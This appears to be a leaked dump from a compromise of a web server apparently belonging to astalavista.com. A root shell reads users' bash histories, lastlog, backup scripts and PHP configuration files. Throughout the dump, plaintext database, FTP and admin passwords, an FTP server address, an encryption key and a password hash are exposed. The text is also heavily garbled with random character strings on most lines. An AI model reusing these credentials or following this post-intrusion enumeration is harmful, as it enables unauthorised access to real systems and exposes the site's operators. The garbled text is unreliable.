2 S2 z. j1 _9 c' R4 Nastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::" T5 B& M7 X5 m1 f# X; \1 b2 @
" I. T. B5 L: O/ t5 x/ e7 x
sh-3.2# cat /etc/motd$ `8 I* |; w/ O: g+ B: i
#####################################################
. i3 W7 Y- K# d( O$ g; }9 n#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
: L3 j3 N( {/ P4 A# |__| [__ | |__| | |__| | | | [__ | |__| #
% {$ Q! d5 |7 i% f$ ?# | | ___] | | | |___ | | \/ | ___] | | | #
" d% F$ z" v, V$ z$ ]' g( c4 D8 L# #/ I8 h Z# r- B+ y! \" ^1 }9 r
#####################################################
4 F0 x2 w. z- \( \# #
' O. b* [! k0 s/ I/ X" u7 c# Admin Contact - 链接标记support@secureservertech.com # }, ~/ M- O; n, ]
# #
2 U& {; @6 A7 E* v) a* f# Available ShortCuts #1 u3 e# a: d8 c
# #7 _8 A4 Z- y; R4 }. O% P
# nst - list active connections #7 P9 L2 h6 i$ B+ x/ m
# ddos - shows how many times each ip is connected #" T0 y S3 v; x* X8 N y
# ltr - restart the webserver #
9 ~% J+ P# p* e+ }# i5 r# phpc - edit the php config file #' k5 I! o! V0 ?- R" D! Y. J
# htc - edit the webserver configuration file #- m* i* t) {( m: \0 ~
# up - uptime #
% O! Y; g& V Z7 Q& h# etd - edit the motd of the day file #
( \+ ~! ^$ @ w0 v# htr - start and restart apache if needed #" v# I2 v8 i) x7 M' q
# syng - shows active SYN_RECV connections #
" `/ ?7 [+ c C g# synd - syn flood blocker - “synd -h” for usage #
2 |$ \3 I) X3 W4 T' B- Q g##################################################### g+ L; B( c' F/ p1 u2 u0 f2 V: S
# NOTES: #. s4 _7 D) V, C4 I+ \
# Last Upgrade - 12-08-2008 by JF #
0 n& s3 x: a8 [9 u' b7 o" B9 r S# My.cnf/Mysql Optimization - 1-28-09 #
9 R1 ^; V) p' N; R9 t# #
$ w! E. d$ N1 Y V# #! l7 Q$ ^( i& {. X. H4 c- d
# #
$ \2 U3 @) d; Y7 C# ]#####################################################
. |# T) U( E0 ^: p, J( v2 |9 m- Q* T9 N2 A: @, x
sh-3.2# lastlog | grep -v Never3 a# U/ P( h2 t5 n
Username Port From Latest
: I1 B! a" a) d$ \: N% O* @root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20092 S' l9 e* _) e; m4 u( v9 A$ s( R8 A
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
/ s" Y! M- p& n' ccom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
$ S& t/ O* L: O# \9 q) \- d aastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
7 s. [ ?* z. J0 _/ c$ K O/ m# a8 H' x, J3 O
sh-3.2# ls -la0 Q+ e' F) _* q8 G1 o
total 453376/ t5 d5 P' {0 Y3 _- k
drwxr-x— 15 root root 4096 Jun 4 08:40 .& c9 T- V7 r" I
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..9 v: H7 W# L0 }: O& n5 i- [( h
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
4 A+ j0 [- M1 q; b4 F# ^9 e-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
' A6 ?! z( Q% T-rw——- 1 root root 16836 Jun 4 07:21 .bash_history! o, T- N% X# e0 X1 ]
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
, H8 x9 I4 B4 I# [7 W-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile$ _' x4 l' W- s5 _9 a: T
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
! l, n% e/ |6 }6 V9 s-rwx—— 1 root root 1899 Oct 28 2007 bk.sh; i" f. U- C( x, s
-rw-r–r– 1 root root 1327 Nov 29 2007 cert* @) @; ?9 i1 N, j+ W0 ?% u4 y6 h
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql& V" t) \- q( O6 w8 Q5 _, ?
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan5 ^* R! E% r4 W5 M
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
1 z }. ^8 ~* T& D- W-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
" w# g2 W# b) T& a1 g7 Fdrwx—— 2 root root 4096 Oct 28 2007 .elinks
( v3 o. @+ X7 V% fdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
4 m5 ~& T) K0 t; S Y# n-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
2 E. m _# v ?. E-rw——- 1 root root 0 Apr 16 13:19 .history
+ u2 _, R" t8 E9 u# N6 T/ |-rw-r–r– 1 root root 16095 Sep 11 2007 install.log7 I$ d( @1 P) H' o, x# C5 C
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
3 M) M/ N$ t ^ P* i9 o1 H6 @-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh$ [- i- l5 W! R$ P3 y8 O
-rw——- 1 root root 35 Jun 2 14:23 .lesshst) D9 |' X9 e/ ]1 M3 d, C
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp5 ]+ Q3 Y4 b2 W6 Y) E
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
$ b- i2 v5 J* B) n-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz" W$ K; l: K* u0 J+ C& p! G! c
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2/ G4 _: D4 f, R, N
-rwx—— 1 root root 760 Sep 18 2008 lp
% ]! @- g2 l# m) f# D( F3 Rdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.14 H% m( V7 e/ O5 {! d- j
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
! Z, j+ j$ D% z5 M1 d. [, ~0 @; O-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1; p+ F5 V, T: C& v
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9; E3 U1 D, ]2 x. X
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
# F O0 W7 ?- ~2 Jdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3 J/ g/ Z$ s0 {+ w% ^' i3 Z
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz" T8 u1 I+ ^9 ~+ @
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
+ [, J6 O3 T) D4 c-rw——- 1 root root 41 Oct 19 2007 .my.cnf
' i' I* ]) |2 Z) B( ?-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history: b$ n y% I5 n
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
+ t3 W3 Q; ~" \9 L-rw——- 1 root root 41 May 20 2008 .mytop
1 y5 H6 ]- [2 ^# O! ~6 Ydrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.68 [9 S# [+ k0 e+ _. Z
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
- w6 d# H1 e( n+ j% ldrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp$ w- c! P; @) ?1 L- d( ^
-rw——- 1 root root 1462 Sep 21 2007 opt.php' C: S6 X! T9 p* u; p% w
-rw-r–r– 1 root root 3371 Sep 22 2007 p% F# ^% O4 x3 C+ `* H+ e! h$ r
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
& p* ^& N/ S v5 d# W-rw——- 1 root root 1024 Feb 3 21:32 .rnd& f# s# Y7 e7 a, N- p- P6 \
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
; l2 I0 M4 H2 |7 t9 @& s-rw-r–r– 1 root root 887 Nov 28 2007 server.key
& k7 Z' y) x" r; `# Z; n2 o& G( udrwx—— 2 root root 4096 Oct 10 2008 .ssh
# z; X3 ]1 K. c5 f5 v4 y-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat/ @) ~' J! \! t; ]
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc4 R( k+ @; a: t8 S+ ~) O
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip. o7 j0 \: H2 m- Y
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
, G# f' w" A) W/ Bdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
( g; ^0 D2 D o' F-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
! T! [5 u! `- y2 hdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
7 K% n C- u' }1 a0 g-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz22 ?0 c* u9 ~! s1 S7 W) @$ m* L1 z! {
-rw——- 1 root root 12997 May 16 2008 .viminfo
. ]# g% X i' c2 q D! B' h3 u8 R) c9 p. k" g" N7 Y# \6 c
sh-3.2# cat .bash_history) D* A0 O: ?6 h7 j: s0 H: A
[snip]+ Z, C" k( H# ^- {. f& N
wget cp4sst.com/sstlinux.tar.gz5 K* i& ?" F+ P0 ]
tar zxvf sstlinux.tar.gz
1 ?# @& b! k" @8 ~1 P, _cd linux-2.6.27.10
, t5 b% }: c' e- m. [8 Hsh install.sh2 Z3 i( V+ K; R' E- C9 O
make bzImage ; make modules ; make modules_install ; make install9 B' g7 ~ C" Q! W$ s* x
make clean
1 O4 B1 [3 H3 E6 Lservice mysqld restart
2 Z! N) W6 `1 X$ h- _2 T[snip]
: C. r i7 h! Y7 N& x a" Gcd /usr/sbin/2 {2 a; R' D* Z9 X% W& O
chmod 4777 traceroute9 E) b! T2 @( Q* J! y( E% |2 ~, V
chmod 4777 ping7 L$ Q {1 w/ E0 j# H C' R, Q
traceroute -I 链接标记[url]www.astalavista.ch[/url]2 t# R5 }/ J; n% {4 K# j, V8 n
[snip]* S g$ f8 d( y9 f2 r& b( Z
vi /etc/csf/csf.conf
' N) g8 F/ m2 u% b" ~9 qtraceroute google.ch& J4 U9 V# W P# W$ u" U( M
service csf restart( y' f6 j2 ]* r5 a, }2 b
tracert google.ch; ~1 s! c9 {9 z7 u0 W: {) D
service csf restart
6 n9 O9 T7 H4 Etraceroute 链接标记[url]www.google.ch[/url]5 p( Q D+ h# j! Y) v& o
tracert 链接标记[url]www.google.ch[/url]% R2 q. P8 P* z) e V# P$ N- C
traceroute 链接标记[url]www.google.ch[/url]
- y. C% p6 j9 U j" m( c" K+ K5 {% klocate traceroute9 R4 B) Y, c( e" D$ k3 f$ B
chown 4755 /bin/traceroute7 P# w2 {6 y; n$ Z
chown 4777 /bin/traceroute$ o" z$ A+ O+ F6 z1 ?. s
locate ping: A4 G, i- U0 b% }( y4 g
chown 4755 /bin/ping
" m3 i" Z% [ e" m. h7 Echown 4777 /bin/ping9 X. f0 n+ H$ n' k6 G
cd /bin/! {" V, I: B! d/ M/ ]4 F4 o
ls -ali | grep ping
3 t3 v! D F, }6 mchown root ping
" d, r2 `# {: ?# y% k1 h+ }chmod 4755 ping
/ j4 d% c2 T0 L/ H* Lls -ali | grep traceroute8 X* b+ k1 o# a4 {# O
chown root traceroute
$ x( ]6 J! z' ?chmod 4755 traceroute* s5 a% `$ {5 E, a# [
ls -ali | grep traceroute
- v2 n* t/ W. }% vtraceroute -I 链接标记[url]www.google.ch[/url]
0 K9 Z5 w5 ~9 F5 Mtraceroute 链接标记[url]www.google.ch[/url]2 o, h! h8 u7 n2 d3 ?' i/ d4 a7 t- w
whois pmsantos.ch
$ q/ k3 w2 F) f7 \& c& L[snip]$ L) O9 s) [" M% X
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
( s7 q( A; g+ \9 y; c* ^$ l8 G9 R) Rmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql' a+ P& t- {# A* U
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
, J k5 ^1 ~% R$ z: L9 ]mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql+ }2 D9 u' A6 v2 ^
top
" V- D \# i m/ ~1 w, P. jping ssth.ch
/ Q% z( f) O0 I( n6 K+ ^1 Iping asdlkfaljgasd???ljg???lasj.ch: E7 |' e9 m" u8 }' e
ping asdlkfaljgasdlasj.ch
; X* |7 T+ I4 M9 @% q& }; Gping 链接标记[url]www.ssth.ch[/url]
1 \* D6 p7 ~6 n' f" Mping ssth.ch
1 {( [& R% j8 }/ i' {nslookup 链接标记[url]www.google.ch[/url]$ F$ I- S Y# ^+ y/ P" s) f
nslookup 链接标记[url]www.ssth.ch[/url]; k5 e l7 B" p# }- G/ p: w
man nslookup; e. z+ K% \6 A! U" v3 y4 c# Y) Q& |
ping 链接标记[url]www.google.ch[/url]
; s, ^( A* X3 w- K5 C% Enslookup 链接标记[url]www.google.ch[/url]9 b/ T4 r5 _" ~' m8 s$ D
nslookup 链接标记[url]www.google.ch[/url] G! C1 w; _- i0 v) c
nslookup salfjasdlf.ch' C. g% ^% k3 a! ?9 I& u
[snip]& u/ q% b- H# J1 A/ \4 Y
openssl passwd -1 sadf
; L9 G# j& o+ u2 X& p2 K5 ^+ C0 k0 ^openssl passwd -1 5cZNHstdTy
0 w. S# E7 N9 wmysql0 k4 G* q, i6 u6 a
mysql* J# K( N& {, s( c; |6 E
locate proftp+ h$ W& q: F& c9 S) |' d0 K0 q' N
vi /etc/proftpd.passwd, s+ y- k" @- |5 e, R% L# @" ?. y. c; O
service proftpd restart. X9 a2 [0 r. u0 j) X
locate proftpd.conf
" M) j& _$ C) u% Fvi /etc/proftpd.conf9 ?( S) o+ e" d) a! j4 k
vi /etc/proftpd.passwd
/ c6 B+ e6 Z6 _& Q% W2 _2 pservice proftpd restart$ o: ~' C* H9 Q
[snip]
) [, Z2 P H2 @6 }, X* f3 g/bin/sh /home/com/backup_system/backup.sh
4 k6 p: K( Q6 O( b" I2 Htar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin* W' x1 [: T/ ^9 E
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
' _* L) ?" |1 ` Dmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql, n* S8 [3 e* w {$ p' u9 P
ls -ali
; A5 Y, {5 c, u, @mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql9 b# F; E6 l; h/ b; f5 {
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
' l0 _# q: g& P" V+ W0 y: Hcrontab -l' q& R' B3 n% t. B2 S
crontab -l
( _- A+ e. U4 _3 T) H- kphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
9 I0 f1 T. a+ T3 ]$ A j8 E1 i; F, H/home/com/public_html/modifications/cronjobs/exploits.sh% [/ u& v+ r8 }0 D) Y# @
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url], S- t+ T4 c ^' G0 P
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
/ }: {' H" c3 }cd lsws-4.0.3
: y& H: ~8 I# c" |2 gsh install.sh* u' h- V) p* x! ]$ i- e9 A2 R
uptime
8 |; l6 Y2 W; h* }hdparm -tt /dev/sda
0 s: g5 R+ T+ j$ g7 |3 E/ B* I/ miostat
8 U/ h9 M6 r, z' u Fyum install iostat
$ m# @7 P6 M" g+ h4 V0 O3 |+ riostat* {& |; O) Y$ P8 B
whereis iostat
* g/ V( A$ g; ~% H9 j: Myjm clean all
+ e7 b z7 f- @4 k) Q; W6 \yum clean all ; yum -y update( O* o" j0 L$ ]$ n# `( I
iostat X( `' V `) }' e
yum install systat
! `: N' f# h+ }' l1 ~rpm -qa | grep iostat0 C- G5 Y0 I$ |6 P
rpm -qa | grep sysstat+ s) _6 E; k+ y+ z
rpm -qa | grep systat
" K1 i4 ] D) E f# jdmesg -c: R& Q" A& w7 u$ }, v5 U) ]
sysctl -p
4 S: p# Z; Q4 f/ nuname -r
2 Z& U: S. b& ~ T- a3 ycd /usr/src
* w F1 |0 z4 ~/ ~. {1 Wwget nix101.com/kernels/sstlinux.tar.gz* i9 E1 ?$ T. A) k' r8 W _4 Q( ~
shutdown -r now; b$ R! D A5 G4 ?9 }
nano -w /boot/grub/grub.conf
0 E6 C: E, V# \# J# Z1 n' Q
$ Q# v& X8 }* m; Z, e. [ Fsh-3.2# cat .my.cnf
7 m' R, Y; r- `& n3 G, n: R; k5 u[client]+ [& J( `3 u5 @4 v! p7 ^) [" T7 X
user=da_admin$ X3 t6 E3 z1 O
password=X9dctmRH. k6 `3 y" z2 W( B# {, L" `+ E% _& W
1 u4 H( H! h9 d; o( hsh-3.2# cat /home/com/backup_system/backup.sh
" q6 ^7 @5 c+ H0 R#!/bin/sh
. Q% @4 _ u2 s- ^+ U# K#####################################################################% V2 E: ~/ v" y; r6 R# F E
# #* a1 O8 Z- o' W& n; \% O: h
# incremental backup for astalavista.com #
4 u% {9 h6 S% `4 M6 P# #
0 R* N/ O9 A8 m# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
2 c0 M' M8 Q) D# v1 {$ f) m+ @$ H* W# #
9 i4 ]5 d# |# v* q#####################################################################
: X5 o0 F' F/ p$ R$ }4 G[snip]% Z' n! h5 e! j! ?' i/ N
PROG_DIR=”/home/com/backup_system”;
: Y% w) c4 C4 Q" CBACKUP_DIR=”/home/com/backups”;
% n+ |# w9 y" `DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;8 ~" A' q7 ?( B* I# [7 U0 P. i t5 w- G
# ftp for synology backup server4 ]8 @; z! ]/ D0 i7 N
FTP_HOST=”212.254.194.163″;
. X# v& y; z0 i" \FTP_PORT=”21″;; A) p. B( w1 d
FTP_USER=”astalavista.com”;
8 h* S4 w& V, w! @/ xFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”; }2 |, a7 e1 w! f; O
FTP_DIR=”/astalavista.com”;
t4 m1 F# x( @7 k# database
& H) b5 {4 d6 f( ^( F1 |DB_HOST=”localhost”;1 Y' P3 N9 G8 |; T5 R1 {. P2 D
DB_USER=”contrexxuser2″;
; y& _; i- B5 ^! ~: k NDB_PASS=”0fEYNZgXz1pKe”;
/ F6 X8 r1 p1 W: k; qDB_DATABASE1=”com_contrexx2_live”;
1 S" ~( @* s6 m. e7 }DB_DATABASE2=”com_contrexx2″;& V, N4 e: m7 T& y6 W
[snip]# _9 {% G, j* B, i
ftp -in $FTP_HOST $FTP_PORT <<EOF
2 D( f8 R z3 _$ \% m! Equote USER $FTP_USER
) C* O* t$ t* {) K' q% wquote PASS $FTP_PASS
: e3 T" W$ _% y8 \. \9 m6 Hcd $FTP_DIR
% l4 c9 _. v2 I- xput $DB_FULLNAME-SQL_Dump.tar
( G. G6 A/ f3 Jput $BACKUP_FULLNAME-Public_HTML.tar6 W X! {2 ]( Q- q% ?
close
7 t; \# J# }9 L1 d) L) Abye- s/ F, ~ @4 X0 n1 {' P$ X& j
EOF4 x) X8 q3 V4 W5 f7 k) N+ F u
% U' I# {) \+ u2 c' E5 {
sh-3.2# cd /home& f. o% ?$ d( L6 U# r
sh-3.2# ls -la
* C% j/ z/ d$ Q+ i: }4 K3 }1 n! Rtotal 120$ N$ H. B# C7 a- A, I2 i9 m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
+ `" Q" O' e' i) [8 b. x, H# ldrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: ^' Z3 o' A. ddrwx–x–x 9 admin admin 4096 Nov 28 2007 admin( h+ a8 u& _- }
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
( b F0 Q. `$ Y" S$ D* @-rw——- 1 root root 8192 Jun 3 02:45 aquota.user& T1 i6 @; f% o1 K" g4 S
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
0 C9 d( Q% k; F& V4 pdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
; Y2 `8 [& o' n7 ~8 Pdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161( f1 q2 U2 f0 o5 k+ j( |
drwx–x–x 10 com com 4096 Apr 28 12:40 com
" r/ x5 J. l6 z& A7 F. p) W7 sdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
" ~9 p! z/ j; v E- F' B5 Vdrwx—— 3 jon jon 4096 Sep 21 2007 jon* y; t4 C F7 Y1 _9 Q
drwx—— 2 root root 16384 Sep 11 2007 lost+found
+ {+ G) ?. G) D) U7 idrwxr-xr-x 2 root root 4096 Sep 14 2007 my
% o6 c5 N% P- ^% I9 f, ~8 r, Rdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata; M( U2 s8 R* s: c# B! H$ ]
drwx—— 2 jon jon 4096 Sep 15 2007 test- L6 f5 m1 S/ q! w3 y1 R" Y
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp {) j8 ^2 Q/ d, L6 A
' Q9 n" p+ E- E5 |. w9 A" x7 h
sh-3.2# cd admin+ n8 l( | o' W& F& ]# B, c7 j4 k6 Q
sh-3.2# ls -la
2 Z; U A9 H/ ?* g. _" a6 ctotal 1735896
4 E1 K) C7 P' V/ p+ g; Vdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
1 `, w2 U. a1 G! v7 Q9 l5 N+ P- Rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 p9 l% }. z* [0 S, Tdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
, r3 `; J" R2 U4 s" l& J* Edrwx—— 2 admin admin 4096 Sep 28 2007 backups' R( }- \/ E8 O ]
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
( R1 W5 j9 b% m' J& p# k-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
& H9 t4 N. C5 e$ s" J" {$ G9 a; B-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
' j- y2 l6 C4 a: m5 u) ?2 ^$ P* v1 z-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc% R8 t; a4 @' K2 Z3 |
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
4 [# \5 m, k5 C/ T3 ~. S [drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
* c% o& [) j3 D4 B7 Wdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap" a; t `* ]1 x# ~$ X
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
& P: j) ^ J# `, T4 u7 Ldrwx—— 2 admin admin 4096 Sep 21 2007 mail
6 [' L9 d B; y) C5 I! m-rw-r–r– 1 root root 716 Nov 28 2007 server.csr% N3 j8 C! w& g0 }& |: X/ x( w6 U
-rw-r–r– 1 root root 887 Nov 28 2007 server.key/ X" [' ]: S5 j
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
( u9 w, U+ V2 Z-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
0 M$ e4 F& s) Hdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups% h% a) I+ E6 C
. h$ B5 l8 _9 r) c( `
sh-3.2# ..
4 c) |8 K9 z' f9 R( P$ c* jsh-3.2# cd jon
0 Q! j }8 }: [# i; a. r; v+ esh-3.2# ls -la
! a9 f2 n7 n3 Q5 A" ~5 s: I' |total 36/ `8 C4 { d% C! C
drwx—— 3 jon jon 4096 Sep 21 2007 .
: g6 {6 v- Q. L" s/ U- ^6 J8 jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 ]7 Q A- k! A, X7 }- l, t
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history" [) N8 d5 ]- a2 y2 k0 O5 u
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout& g1 s! g2 j" H: S% g1 l' N. B+ @
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile) [- N$ o G" }' h) [/ X
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
0 m( B8 x) T: [( e! ^-rw-r–r– 1 root root 24 Sep 21 2007 info.php
- h: |1 ]: D# d' ?7 F: ?( m& [drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html ]# M1 T* i' u: ]6 p
5 h4 v( W. l+ f; _! n6 ish-3.2# cd ..
% P% t2 V' `) ~6 `sh-3.2# cd test
7 F/ V8 C% [7 Q$ Zsh-3.2# ls -la4 q5 R- X ]2 q- _
total 48- ]& `: F3 C$ k( ?0 p
drwx—— 2 jon jon 4096 Sep 15 2007 .. y; @% H) N0 P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
% G, _* f: K+ y8 a-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
* S! } z+ N0 R8 N$ G-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
) D' y3 B6 m, L7 G) X-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile9 v; h2 o% ]1 S2 S$ Y$ p4 {! L
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
+ N' s0 g" t" {8 R# g, msh-3.2# cat .bash_history/ Y% |; D) a: `2 |' {+ f' Z u
/usr/bin/mysqladmin -u root password PoliuJhytg67" R# [. P( z$ j- s6 j8 s2 ?/ p% `6 q& U/ b
$ b k6 a7 I# _4 Jsh-3.2# cd ..
A- @7 s6 ?% P1 J4 J. L' _- t) tsh-3.2# cd astanet: e7 N, E2 `) ~; G5 i/ B( m
sh-3.2# ls -la: {; r) Y5 P9 n
total 52
/ ?, ~& j' z4 v7 @drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
) u& N6 A8 ?4 L2 A: |drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, Q* j, x8 o" T. o3 ] Z; zdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
/ K9 J" S( p5 O-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history% L- T0 X4 a$ O% X( i
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
) @; T* Y8 i- Z' F- b-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
4 ?9 R' o2 G! F0 z* s! `-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
1 o$ H8 L& I& G" P: ?0 edrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains" O' v* n3 Q, h1 ~( E! b- W. E q# P2 b
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
$ q! N B% u8 G3 R, ^. \drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
" k' e. m# U1 j! q( l, G+ Q, J-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history2 y6 u7 D; A8 H% x; `2 L
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html( c+ t' g- J0 X& Y7 L h
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow- {& N* [! C8 [7 b
; W! O: F, s% `" h; Q0 d# W
sh-3.2# cd auth/' O2 K9 F5 G' q: X2 K
sh-3.2# ls -la
a. i; }& p8 @% Mtotal 283 U6 v/ W F7 N* `
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
, h# c, Q6 A+ D' B+ C5 c9 b9 m3 y. jdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
( I" p4 \; M& {' w6 c9 w J-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php6 t% ~# b+ s/ R4 P
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php/ ^# c _8 a' e) a
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd/ b- X- `' ?/ v7 a( F
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting/ k3 u* X* A# a
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
( ]/ f& m) O' V7 E" X) u9 c* K7 j- b2 `! l5 _$ K2 h# E" T
sh-3.2# cat hackercontest.config.inc.php: h" m! c4 W" \! A
<?PHP
- Y l4 A. ?7 a// Variabeln f?r Verbindung zur Datenbank //
; U- O3 }6 k! x$ R7 V( h$conxHost = ‘localhost’; // MySQL hostname b; A% b8 ? J% i0 g, W
$conxUser = ‘hackercontest’; // MySQL user
0 ^" B: y2 I1 l# D$conxPassword = ‘K6m@7dUc’; // MySQL password
- \7 J, Z* e/ G+ ]. l$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# [' v! s2 j: k1 |) Y
?>: ]: h+ T# _- y4 F0 m
sh-3.2# cat hosting.config.inc.php
6 T6 Z3 Z$ V2 J7 A8 t3 p: V* P<?PHP
3 _0 d$ G% C% Q% y// Variabeln f?r Verbindung zur Datenbank //7 x$ N6 G! P0 w0 J/ p1 W" z( U
$conxHost = ‘localhost’; // MySQL hostname
' i; E/ Q: i, _$conxUser = ‘hostinguser’; // MySQL user" X/ V U% k# |8 Z3 R
$conxPassword = ‘cXvB3981′; // MySQL password
1 x; y7 @# \7 l8 l/ \1 O$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
+ t% v0 A, U* W# l. J& ]' Y6 z?>
7 k/ c6 m% [* M4 O* v/ r5 ^3 N: [$ o
